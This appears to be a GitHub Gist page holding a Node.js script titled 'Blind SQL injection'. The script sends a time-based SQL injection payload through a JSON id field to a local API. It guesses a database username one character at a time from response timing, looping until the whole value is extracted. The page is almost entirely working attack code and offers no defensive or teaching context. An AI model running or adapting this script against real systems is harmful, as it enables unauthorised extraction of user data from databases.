Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Blind SQL injection
const http = require('http');
function request(json) {
return new Promise((resolve, reject) => {
let startTime = Date.now();
let body = JSON.stringify(json);
const options = {
host: 'localhost',
method: 'POST',
port: 3000,
path: '/api/v?/xxxxxx',
headers: {
'Content-Type': 'application/json',
'Content-Lenght': body.length
}
};
let req = http.request(options, (res) => {
if (res.statusCode === 500) {
resolve(Date.now() - startTime);
} else {
reject(0);
}
});
req.write(body);
req.end();
});
}
(async () => {
let charset = 'abcdefghijklmnopqrstuvwxzABCDEFGHIJKLMNOPQRSTUVWXZ 0123456789.\'';
let offset = 1
let value = '';
let result = [];
let code = 0;
while (true) {
let time = await request({
"xxxxxx_id": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
"xxxxxx_id": `1" and IF(RIGHT(LEFT((SELECT \`user_name\` FROM \`xxxx\` LIMIT 0,1),${offset.toString()}),1) = '${value}', SLEEP(0.001), FALSE) and ""="`
});
if (time > 1000 && value === '') {
break;
} else if (time > 1000 && value !== '') {
console.log('Found character', value, 'at', offset);
result.push(value);
value = '';
offset++;
code = 0;
} else {
value = charset[code++];
if (code >= charset.length) {
result.push('?');
value = '';
offset++;
code = 0;
}
}
};
console.log('Result:', result.join(''));
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.